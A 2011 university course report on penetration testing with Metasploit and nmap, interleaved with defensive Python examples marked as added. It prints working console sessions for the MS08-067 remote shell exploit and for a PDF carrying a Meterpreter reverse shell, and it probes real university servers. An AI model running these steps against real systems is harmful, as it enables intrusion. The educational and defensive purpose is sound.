
MIEIC - SSIN (Computer Security)

Tomé Duate, Robert Kulzer

Final report

Group 5, T9

2011/2012

December 6, 2011

1 Introduction

There are numerous studies on malware development over the past decade, and they all show rapid growth over the last years. Figure 1 shows one of these malware statistics.

Figure 1: Number of Entries on the Google Safe Browsing Malware List

Many software developers do not pay much attention to possible security flaws while developing applications. A common mistake is to think that security can be implemented later on. But writing robust code means thinking about security from the beginning to the end.

2 Goals

In this project we want to create awareness among our fellow students for writing secure code by showing how software can be exploited. We want to provide knowledge on certain tools to check for vulnerabilities, from the network layer up to the application layer.

Moreover, we want to explain penetration testing and its crucial value for today's companies, and the general guidelines a penetration tester follows [1]:

1. Pre-engagement Interactions
2. Intelligence Gathering
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
7. Reporting

As penetration tests are conducted either as Black box and/or White box tests, we want to explain and outline the differences between these two paradigms.

Furthermore, we will provide information on noteworthy web sites for getting more involved in the matter. In addition, there is a large variety of security tools any interested student should be aware of and may want to try. All this information is included in this work.

We intend to state the legal concerns which one has to take into account before starting a penetration test.

3 Approach

The attacked machines in this demonstration are virtual machines. This gives a close-to-real-world example without harming actual machines. The whole demonstration follows the penetration testing guideline introduced in section 2 (Goals).

The first machine is a Windows XP standard installation with Service Pack 3 installed. This machine is called WinXPSP3. The other machine is a Windows 7 standard installation with Service Pack 1. This example should demonstrate that even newer systems can be compromised. This machine is called Win7.

In both cases the attacker is in the same network as the victim; there is no firewall, VPN, IDS or anything else shielding the targets.

3.1 Metasploit

Many penetration testers use security frameworks for their work. They provide a more convenient and efficient way to manage scans and vulnerabilities, so certain tasks can be performed much faster. Metasploit is such a framework [2]; it is open source and is used to retrieve information on vulnerabilities of targeted systems.

3.2 Other software

Armitage: a GUI for the Metasploit framework [3].

nmap: a free and open source utility for network exploration and security auditing [4].

whois: looks up the registered users or assignees of an Internet resource (such as a domain name or IP address).

host: a DNS lookup utility.

telnet: a network protocol and client to connect to a specified port on a remote host.

and many more ...

4 Getting in touch with the target

4.1 Pre-engagement Interactions

The Penetration Tester's Guide [1] defines this stage as the negotiation point. Here the security engineer and the client meet and discuss the terms of the security evaluation. The point of this contract is to define the goal of the endeavour.

Furthermore, the penetration tester may decide on a Black box and/or White box test. The Black box test is performed without knowledge of the internal structure or routines of the targeted system. Such tests are mainly used to check whether the specifications are implemented in the way they are meant to be. In penetration testing, this test is considered the real-world example. The White box test is the opposite: here the internals are known. Thus, the penetration tester can launch more wide-scale tests against a system from the inside. This approach simulates a malicious actor on the inside, who has the authorization to access sensitive areas guarded by various mechanisms. The hybrid method, sometimes referred to as Grey box testing, assumes that the security engineer has some knowledge of the internals but does not have credentials to obtain higher security clearance. This level can be reached after gathering intelligence on the targeted system while still being at a basic user level.

Depending on company policy, it may be interesting to keep the employees (including the IT department) unaware of a penetration test.

Figure 2: Black and White box testing

4.2 Intelligence Gathering

In this stage the penetration tester tries to gather as much information on the targeted system as possible. The more information he gathers, the more elaborate his attacks and results can be. Common techniques are fingerprinting of hosts, Google hacking, social engineering and so on.

The security engineer wants to identify the defence systems within the network, such as Intrusion Detection Systems (IDS) [6], firewalls, honeypots [5] and the like. Depending on the strategy, the penetration tester may want to be as noisy as possible to attract attention, or silent to stay under the radar of the defence systems. He could also combine both strategies to distract the defence systems from the actual attack, using different IP ranges and heavy port scans. There are numerous scenarios for performing the penetration test; the attacker selects appropriate measures depending on the given configuration of the network.

~# nmap -sS -PN WinXPSP3

Starting Nmap 5.21 ( http://nmap.org )
Nmap scan report for WinXPSP3
Host is up (0.0010s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
445/tcp open  microsoft-ds
MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)
Listing 1: Default nmap scan on single host

In a very basic nmap scan on WinXPSP3 (refer to listing 1), the output provides information on the open ports. This gives the penetration tester a basic idea of which services are running on a machine and may have flaws. The option -sS uses a TCP SYN as the connection attempt (no full connection is established) and -PN skips host discovery, assuming the host is online. These two switches provide a very basic method to stay a little more silent. If nmap were used without any options, a connection would be established, hence the process on the scanned host would most certainly be aware of the connection attempt.
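The defender's counterpart to the scan above, added here as an example and not part of the original report: a small Python detector that reads iptables-style firewall log lines and flags a source that sends SYN-only packets to many distinct ports of one host within a few seconds, which is the pattern a -sS sweep leaves in a gateway's log. The log line format (modelled on the Linux kernel's LOG target), the threshold, the window and all sample lines are constructed assumptions.

```python
"""Detect TCP SYN port sweeps in iptables-style firewall log lines (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Hypothetical line shape, modelled on the Linux kernel's iptables LOG output (assumption).
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=TCP .*?DPT=(?P<dpt>\d+)(?P<rest>.*)$"
)


def parse_line(line, year=2011):
    """Return the fields of one TCP log line, or None if the line is not a TCP log entry."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    flags = set(m.group("rest").split())
    return {
        "ts": ts, "src": m.group("src"), "dst": m.group("dst"), "dpt": int(m.group("dpt")),
        # A SYN without ACK is a new connection attempt; that is what -sS sends.
        "syn_only": "SYN" in flags and "ACK" not in flags,
    }


def detect_syn_sweeps(lines, min_ports=10, window_s=5):
    """Map (src, dst) -> (distinct ports hit, window start) for every pair where one source
    sent SYN-only packets to at least min_ports distinct ports within window_s seconds."""
    events = [e for e in map(parse_line, lines) if e is not None and e["syn_only"]]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(deque)  # (src, dst) -> (ts, dpt) pairs inside the sliding window
    alerts = {}
    for e in events:
        key = (e["src"], e["dst"])
        q = recent[key]
        q.append((e["ts"], e["dpt"]))
        while (e["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()
        ports = {dpt for _, dpt in q}
        if len(ports) >= min_ports and len(ports) > alerts.get(key, (0,))[0]:
            alerts[key] = (len(ports), q[0][0])
    return alerts


def _line(ts, src, dst, dpt, flags="SYN"):
    return (f"{ts} gw kernel: [FW] IN=eth0 OUT= SRC={src} DST={dst} "
            f"PROTO=TCP SPT=40001 DPT={dpt} WINDOW=1024 {flags}")


# Constructed sample log (not captured from the report's lab): one host sweeping twelve
# ports in one second, one legitimate SMB client, one slow five-port probe, one UDP line.
SCAN_PORTS = [21, 22, 23, 25, 80, 110, 135, 139, 143, 443, 445, 3389]
SAMPLE_LOG = (
    [_line("Nov 12 18:59:01", "192.168.56.1", "192.168.56.102", p) for p in SCAN_PORTS]
    + [_line("Nov 12 18:58:30", "192.168.56.50", "192.168.56.102", 445),
       _line("Nov 12 18:58:30", "192.168.56.50", "192.168.56.102", 445, "ACK"),
       _line("Nov 12 18:58:31", "192.168.56.50", "192.168.56.102", 139)]
    + [_line(f"Nov 12 18:{m}:00", "192.168.56.60", "192.168.56.102", p)
       for m, p in zip((50, 52, 54, 56, 58), (80, 443, 22, 25, 110))]
    + ["Nov 12 18:59:02 gw kernel: [FW] IN=eth0 OUT= SRC=192.168.56.60 "
       "DST=192.168.56.102 PROTO=UDP SPT=5353 DPT=5353"]
)

if __name__ == "__main__":
    for (src, dst), (n, start) in detect_syn_sweeps(SAMPLE_LOG).items():
        print(f"possible SYN sweep: {src} -> {dst}, {n} ports from {start:%H:%M:%S}")
```

The slow five-port probe and the ordinary SMB client stay below the threshold, so the sweep of twelve ports in one second is the only alert. A stealthier scan spread over minutes (or the idle scan described next) would need a longer window and a lower threshold, at the price of more false positives.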

There are more elaborate approaches to minimize the noise. With the so-called TCP idle scan the attacker can spoof the IP address of another host in the network and thus evade detection. In order to perform this method, one has to identify hosts in the network that have incremental IP ID (packet fragment identification number) enabled. The Metasploit framework comes with such a scanner; its use is shown in listing 2.

msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > set RHOSTS 192.168.56.0/24
msf auxiliary(ipidseq) > set THREADS 50
msf auxiliary(ipidseq) > run
[*] Scanned 045 of 256 hosts (017% complete)
[*] Scanned 086 of 256 hosts (033% complete)
[*] Scanned 095 of 256 hosts (037% complete)
[*] 192.168.56.101's IPID sequence class: Incremental!
...
[*] Auxiliary module execution completed
msf auxiliary(ipidseq) > nmap -PN -sI 192.168.56.101 WinXPSP3
Listing 2: Metasploit TCP idle scan

Listing 2 shows that the host with IP address 192.168.56.101 is a valid candidate for a TCP idle scan. The option -sI tells nmap that the following hostname or IP address is the so-called zombie host used for the scan.

Listing 3 shows another useful nmap option, -A, to gather more information on a target system: not just the fingerprint of the OS running on the target, but also whether there are routers in between (HOP = 1).

~# nmap -sS -PN -A WinXPSP3

Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-12 18:59 WET
Nmap scan report for WinXPSP3
Host is up (0.0014s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
| nbstat: NetBIOS name: HACKME, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:18:22:b6
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: WORKGROUP\HACKME
|   System time: 2011-11-15 18:59:38 UTC+1
|_smbv2-enabled: Server doesn't support SMBv2 protocol

HOP RTT     ADDRESS
1   1.38 ms 192.168.56.102

OS and Service detection performed.
Listing 3: Nmap OS discovery

But nmap is not the only tool for gathering information on the network and its hosts. Classic UNIX tools like whois, host and ettercap, but also capable network sniffers like Wireshark [7] and scanners like OpenVAS [8], serve the penetration tester in gathering intelligence.

In listing 4 the host and whois output for up.pt is shown. At first glance this information does not seem to be of any value to a penetration tester, but the mail server and DNS addresses can already be identified without even making contact with any of the up.pt hosts.

This information is especially vital if a security engineer is to evaluate in a Black box scenario.

~# host -t mx up.pt
up.pt mail is handled by 20 relay2.up.pt.
up.pt mail is handled by 10 relay1.up.pt.
~# whois up.pt
Titular / Registrant
   Universidade do Porto
   Reitoria - Praça Gomes Teixeira
   Porto
   4099-002 Porto
   Email: contactodnsup@reit.up.pt
....
Nameserver Information
   Nameserver: up.pt NS dns1.up.pt.
....
   Nameserver: dns3.up.pt. A 193.137.35.100
   Nameserver: dns4.up.pt. A 193.136.37.10
...
   Nameserver: dns3.up.pt. AAAA 2001:690:2200:b10::100
Listing 4: Host and whois queries on up.pt

5 Pin-point the target system

5.1 Threat Modeling

In this stage the attacker isolates the most promising approach. He looks for the most effective attack according to the specifications made in section 4.1 (Pre-engagement Interactions). Here the penetration tester works the way an adversary trying to penetrate the system would.

The identification of vulnerabilities and security flaws in a system is not an easy task. As explained in section 4.2, the attacker has to operate cautiously.

The security engineer now knows which ports are open. Next he wants to learn which software uses each port and which version of that program is running. Listing 5 shows an example of how to identify a web server software and its version. The output states Apache version 2.2.3, and that the server runs on Linux with the SuSE distribution. This output can be cross-checked with the findings from OS fingerprinting.

~# telnet www.fe.up.pt 80
Trying 193.136.28.205...
Connected to sifeup.fe.up.pt (193.136.28.205).
Escape character is '^]'.
GET /index.html HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sat, 12 Nov 2011 14:25:34 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1
Listing 5: Determine the web server version
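The same Server header that listing 5 exposes can be checked from the administrator's side. The following Python snippet is an added example, not part of the original report: it parses a raw HTTP response and reports every header that discloses a product version, so an operator can verify that settings such as Apache's ServerTokens Prod and ServerSignature Off (or PHP's expose_php = Off) actually took effect. The sample responses are constructed after listing 5, not captured from www.fe.up.pt, and the list of disclosing header names is an assumption.

```python
"""Report HTTP response headers that disclose product versions (added example)."""
import re

# "Product/1.2.3" tokens such as Apache/2.2.3 or PHP/5.3.2; "Linux/SUSE" has no digits, so it is skipped.
VERSION_TOKEN_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)*)")
# Headers that commonly carry software versions (assumed list, lower-cased for matching).
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")


def parse_response_headers(raw):
    """Return {header-name-lowercase: value} for the head of a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]   # drop the body, if any
    headers = {}
    for line in re.split(r"\r?\n", head)[1:]:              # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def version_disclosures(raw):
    """List (header, product, version) for every disclosing header carrying a version token."""
    found = []
    for name, value in parse_response_headers(raw).items():
        if name in DISCLOSING_HEADERS:
            for product, version in VERSION_TOKEN_RE.findall(value):
                found.append((name, product, version))
    return found


# Constructed responses modelled on listing 5 (not captured from a live server).
LEAKY_RESPONSE = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Date: Sat, 12 Nov 2011 14:25:34 GMT\r\n"
    "Server: Apache/2.2.3 (Linux/SUSE)\r\n"
    "X-Powered-By: PHP/5.3.2\r\n"
    "Content-Length: 226\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
    "<html>...</html>"
)
# The same server after ServerTokens Prod / ServerSignature Off and expose_php = Off (assumed result).
HARDENED_RESPONSE = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Date: Sat, 12 Nov 2011 14:25:34 GMT\r\n"
    "Server: Apache\r\n"
    "Content-Length: 226\r\n"
    "Connection: close\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, resp in (("leaky", LEAKY_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, version_disclosures(resp) or "no version disclosed")
```

Hiding the version does not remove a vulnerable Apache 2.2.3; it only denies the attacker the shortcut that listing 5 and the exploit-db lookup below depend on. The fix remains patching, which the Reporting section comes back to.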

Having this information, the attacker may proceed to web pages like www.exploit-db.com to obtain information on recently discovered vulnerabilities in Apache 2.2.3, or he could search with Metasploit. Yet another way to discover vulnerabilities is to use nmap scripts: nmap can also scan for certain vulnerabilities on hosts. Moreover, scripts for the Nmap Scripting Engine (NSE) [10] can easily be developed by users and are publicly available.

Listing 6 shows an SMB scan on WinXPSP3. The output reports the MS08-067 vulnerability [9]. This critical flaw allows remote code execution, which lets the attacker gain remote access and hence compromise the entire system.

~# nmap -A -sS -PN WinXPSP3 --script=smb-check-vulns
...
NSE: Script Scanning completed.
Nmap scan report for WinXPSP3
Host is up (0.0013s latency).
...
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
| smb-check-vulns:
|   MS08-067: LIKELY VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED
Listing 6: Nmap smb vulnerability scan

5.2 Vulnerability Analysis

This stage is concerned with the question of how to gain access to the system. Here the security engineer puts together the data gathered up to this point to develop the most effective method to execute the attack.

As for this work, we select the MS08-067 exploit, as it grants total access to the system.

6 Exploitation Process

6.1 Exploitation

After careful planning and information gathering the actual attack can be carried out. In contrast to what was pointed out in section 4.2 (Intelligence Gathering), the attacker should now proceed as silently as possible. Massive and random launches of exploits are usually not the way to go in this stage.

Listing 7 shows how easily remote access can be obtained using the Metasploit framework. In this scenario the command-line version of Metasploit is used.

• At first, the IPv4 address of the attacker's machine is set.

• The payload is the remote code which will be executed by abusing the vulnerability. In this case the payload is a remote shell listening on port 4444 on the victim's machine.

• In the next step, the MS08-067 vulnerability is searched for, via the search engine provided by the Metasploit framework.

• After locating the right module, it is loaded and the penetration tester may configure the attack further.

• The available parameters can be viewed by showing the options. The required fields are marked and have to be provided.

• After setting up all the essential parameters the actual exploit can be started.

msf > set LHOST 192.168.56.1        <--- Attacking machine
LHOST => 192.168.56.1
msf > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf > search ms08-067

Matching Modules
================

   Name                          Disclosure Date  Rank   Description
   ----                          ---------------  ----   -----------
   exploit/.../ms08_067_netapi   2008-10-28       great  Microsoft ...

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name
   ...

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, ...
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST WinXPSP3
RHOST => WinXPSP3
msf exploit(ms08_067_netapi) > set target 6
target => 6
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to WinXPSP3
[*] Command shell session 1 opened (192.168.56.1:33050 -> WinXPSP3:4444) at 2011-11-12
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Listing 7: Getting remote shell after MS08-067 exploit

There are of course numerous payloads to choose from. One of the most intriguing is Meterpreter [11]; this payload gives the penetration tester a wide range of tools and mechanisms to control the client. As the attacker may want to use one or more of the compromised systems as a platform for further attacks inside the network, Meterpreter can be a valuable asset to keep control of the attacked systems.

6.1.1 Meterpreter

Meterpreter is short for Meta-Interpreter, an advanced payload for the Metasploit framework. It provides a much easier way to a richer feature set for the framework; the alternative would be writing a lot of assembly code, which can be very exhausting. Meterpreter operates only in memory, thus staying undetected.

Figures 3 and 4 show the interface of Armitage.

6.2 Using application exploits

Nowadays, operating systems are no longer the main target of malware developers [12]. Injection, XSS and misconfigured session management are much more pressing topics for security engineers.

In addition, social engineering is still one of the most effective ways to compromise a system. Here is an example of embedding malicious code in a benign-looking PDF file. When the file is opened with Adobe Reader [13] (versions 8.x and 9.x), it executes the malicious code.

6.2.1 Malicious pdf

Listing 8 shows how to create a malicious PDF file, using the Metasploit framework to embed code in an originally legitimate document.

Figure 3: Armitage interface, after scanning the network

Figure 4: Meterpreter session opened after compromising Win7

Matching Modules
...

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf ... > set FILENAME <output-path>/buhu-m.pdf
FILENAME => <output-path>/buhu-m.pdf
msf ... > set INFILENAME <input-path>/IPTablesFlowChart.pdf
INFILENAME => <input-path>/IPTablesFlowChart.pdf
msf ... > set LAUNCH_MESSAGE Foobar
LAUNCH_MESSAGE => Foobar
msf ... > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf ... > show options

Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):

   Name            Current Setting
   ----            ---------------
   EXENAME
   FILENAME        <output-path>/buhu-m.pdf
   INFILENAME      <input-path>/IPTablesFlowChart.pdf
   LAUNCH_MESSAGE  Foobar

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, ...
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port
   ...

msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Reading in '<input-path>/IPTablesFlowChart.pdf'...
[*] Parsing '<input-path>/IPTablesFlowChart.pdf'...
[*] Parsing Successful.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating '<output-path>/buhu-m.pdf' file...
[+] <output-path>/buhu-m.pdf ...
Listing 8: Embedding malicious code in a pdf file using Metasploit

The hard part of the penetration tester's work is now to convince a victim to open this document in a version of Adobe Reader that has this vulnerability. Before the victim opens the document, the attacker has to make sure that a connection handler is waiting for incoming connections, see listing 9.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
Listing 9: Generate a generic listener using Metasploit

After completing these steps, the penetration tester should see the incoming connection. Please refer to figure 5 to see Meterpreter with Armitage in action.

Figure 5: Taking a screenshot from the running compromised machine

However, this is a rather simple approach. The attempt would most certainly fail if the machine used a virus scanner. Checking the file with the online malware scanner virustotal.com [14] shows that most of the virus engines can identify this malformed PDF document. See figure 6 for the results on the PDF.

On the other hand, it is not so difficult to prevent detection by virus scan engines: obfuscation techniques render them innocuous.
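The report relies on VirusTotal to judge the generated document; a defender can also look at the PDF structure directly instead of at signatures. The following Python script is an added example, not part of the report or of Metasploit: it looks for the PDF features an executable-dropper document needs (an embedded file together with a /Launch action, an /OpenAction, JavaScript), decodes #xx escapes inside names and inflates FlateDecode streams, so that the two simplest ways of hiding those names from a naive string search do not defeat the check. The sample documents are constructed, and the scoring and verdict thresholds are my own assumptions.

```python
"""Flag PDF structures used by executable-dropper documents (added example)."""
import re
import zlib

# PDF name objects that warrant a closer look; the descriptions are assumed, not from a spec.
RISKY_NAMES = {
    b"/Launch": "action that starts an external program or an embedded file",
    b"/EmbeddedFile": "file attachment stored inside the document",
    b"/OpenAction": "action executed automatically when the document is opened",
    b"/AA": "additional actions bound to page or form events",
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code string or stream",
}
NAME_HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)


def inflate_streams(data):
    """Append the inflated body of every stream zlib can decode (FlateDecode objects)."""
    extra = []
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates a missing trailer; plain-text streams raise zlib.error
            extra.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass
    return data + b"\n" + b"\n".join(extra)


def normalize_names(data):
    """Decode #xx escapes so that an obfuscated /Laun#63h is seen as /Launch."""
    return NAME_HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data):
    """Return findings, a score and a verdict for one PDF given as bytes."""
    if not data.startswith(b"%PDF-"):
        return {"is_pdf": False, "findings": [], "score": 0, "verdict": "not a PDF"}
    text = normalize_names(inflate_streams(data))   # inflate first, then decode escapes
    findings = []
    for name, why in RISKY_NAMES.items():
        # A name ends at a delimiter, so /EmbeddedFiles (the name tree) is not /EmbeddedFile.
        hits = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", text))
        if hits:
            findings.append((name.decode(), hits, why))
    score = len(findings)
    if {"/EmbeddedFile", "/Launch"} <= {f[0] for f in findings}:
        score += 2   # the pairing an embedded-executable dropper relies on
    verdict = "suspicious" if score >= 3 else ("review" if score else "no risky features")
    return {"is_pdf": True, "findings": findings, "score": score, "verdict": verdict}


# Constructed samples (not Metasploit output): a dropper-shaped document with an obfuscated
# /Launch name, a plain document, and a document hiding JavaScript in a Flate stream.
DROPPER_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /Names << /EmbeddedFiles << /Names [(attachment.exe) 5 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Laun#63h /F (attachment.exe) >> endobj
5 0 obj << /Type /Filespec /F (attachment.exe) /EF << /F 6 0 R >> >> endobj
6 0 obj << /Type /EmbeddedFile /Length 4 >> stream
MZ..
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def compressed_js_pdf():
    body = zlib.compress(b"<< /S /JavaScript /JS (app.alert(1)) >>")
    return (b"%PDF-1.5\n1 0 obj << /Filter /FlateDecode /Length " + str(len(body)).encode()
            + b" >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    for label, doc in (("dropper", DROPPER_PDF), ("clean", CLEAN_PDF), ("flate-js", compressed_js_pdf())):
        r = scan_pdf(doc)
        print(f"{label}: {r['verdict']} (score {r['score']})")
        for name, hits, why in r["findings"]:
            print(f"  {name} x{hits}: {why}")
```

A structural check of this kind is the reason the Adobe Reader hardening advice of the era was to disable the launching of non-PDF attachments and JavaScript: it does not need a signature for the particular payload, only knowledge of which document features a dropper cannot do without. Object streams and encrypted documents are outside what this short scanner inflates, so it is a triage aid, not a replacement for a full PDF parser.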

6.3 Post Exploitation

After successfully compromising one or more systems, the penetration tester wants to gather valuable information and intelligence. The security engineer wants to expose the most secure systems in the network, those the organization is trying hardest to protect. In a software company this may be their repository; a bank tries to shield its financial services. These are the systems the penetration tester is after.

Figure 6: Virustotal scan on the embedded Meterpreter pdf document.

As it may be easier to compromise an insignificant host first, the penetration tester may then use this machine to move on to more protected systems. Here Metasploit, or more precisely Meterpreter, provides options to stay on attacked machines, for example by switching the process used for the attack to another one, in order to stay undetected.

7 Reporting

The organizations that hire penetration testers expect them to reveal the vulnerabilities in their networks and how they can be exploited. Hence, this stage is one of the most important. It is not just the holes in the security systems that a penetration tester uncovers; he is also supposed to raise awareness of the flaws in their configuration, to hinder upcoming attacks. The security engineer will also provide solutions to the discovered vulnerabilities and, if possible, eliminate them on a broader scale. For example, if SQL injections are possible, the input for these instances should be sanitized, but the underlying problem still remains. He may also show alternatives that, if possible, eliminate the problem entirely.

As for the examples in this work, most of the vulnerabilities are caused by outdated applications. These security holes can be closed rather easily. But there are still numerous possibilities to find an entrance to an environment considered secure.
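The remark in the Reporting section that sanitizing input blocks the injection but leaves the underlying problem in place can be made concrete. The following Python example is added here and is not part of the report: it shows a login query built by string concatenation, the same query with quotes escaped, and the parameterized form, run against a constructed in-memory SQLite table, plus a numeric lookup where quote escaping cannot help at all. The table, the user names and the inputs are assumptions for the demonstration.

```python
"""Login query: concatenated, quote-escaped and parameterized (added example)."""
import sqlite3


def make_db():
    """Constructed in-memory table. Passwords are stored in clear only to keep the focus on
    the query; a real system stores a salted, slow password hash instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "correct-horse"), (2, "bob", "hunter2")])
    conn.commit()
    return conn


def escape_quotes(s):
    """The 'sanitize the input' fix: double every single quote."""
    return s.replace("'", "''")


def login_vulnerable(conn, name, password):
    # BAD: the input becomes part of the SQL text, so a quote in the input rewrites the query.
    query = f"SELECT 1 FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchone() is not None


def login_sanitized(conn, name, password):
    # Escaping blocks the quote-and-comment payload, but the query is still assembled from
    # strings, which is the underlying problem the report refers to.
    query = (f"SELECT 1 FROM users WHERE name = '{escape_quotes(name)}' "
             f"AND password = '{escape_quotes(password)}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, name, password):
    # GOOD: the statement is fixed; the driver passes the values separately, never as SQL.
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


def names_by_id_sanitized(conn, id_text):
    # Escaping quotes is useless here: the value is not inside quotes, so an input such as
    # "0 OR 1=1" is still interpreted as SQL and returns every row.
    query = f"SELECT name FROM users WHERE id = {escape_quotes(id_text)}"
    return [row[0] for row in conn.execute(query)]


def names_by_id_parameterized(conn, id_text):
    # The bound value is compared as data; "0 OR 1=1" simply matches no id.
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE id = ?", (id_text,))]


if __name__ == "__main__":
    db = make_db()
    payload_name, payload_id = "admin' --", "0 OR 1=1"
    print("vulnerable   :", login_vulnerable(db, payload_name, "x"))      # True
    print("sanitized    :", login_sanitized(db, payload_name, "x"))       # False
    print("parameterized:", login_parameterized(db, payload_name, "x"))   # False
    print("by id, sanitized    :", names_by_id_sanitized(db, payload_id))     # ['admin', 'bob']
    print("by id, parameterized:", names_by_id_parameterized(db, payload_id)) # []
```

The escaping variant passes the first test and fails the second, which is exactly the point the report makes: the durable fix is to stop building SQL from strings (parameterized statements or an ORM that does so), and a report should recommend that rather than a per-field sanitizer.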

8 Conclusion

Even though many companies and governments nowadays invest more money in their IT security departments, the number of news reports about compromised databases, industrial espionage and so on is still rising. Organized crime has discovered the huge potential profit in online crime. But also crash kids (aka script kiddies) and self-appointed freedom fighters are a threat to the data each one of us wants to protect.

Penetration tests can be one instrument to unveil security flaws in networks and systems. These security engineers operate as if they were hackers, but with permission from the organization that hired them. It is certainly not a magic formula to prevent future attacks, but it raises the bar an attacker has to surpass in order to gain access. Professional attackers have a business plan, just like companies: if the amount of resources invested is higher than the expected profit, they will most likely reconsider their attack plans. Hackers who attack for fun or prestige will also have to spend more of their time breaking into systems previously tested by penetration testers. Furthermore, penetration testers can help raise awareness of vulnerabilities in software and also of social engineering.


References

[1] David Kennedy, Jim O'Gorman, Devon Kearns, and Mati Aharoni. Metasploit - The Penetration Tester's Guide. ISBN: 978-1-59327-288-3

[2] Rapid7 LLC. Metasploit Framework. http://www.metasploit.com/

[3] Raphael Mudge. Cyber attack management for Metasploit. http://www.fastandeasyhacking.com/

[4] Gordon Lyon. nmap - Discovering hosts and services on a computer network. http://nmap.org/

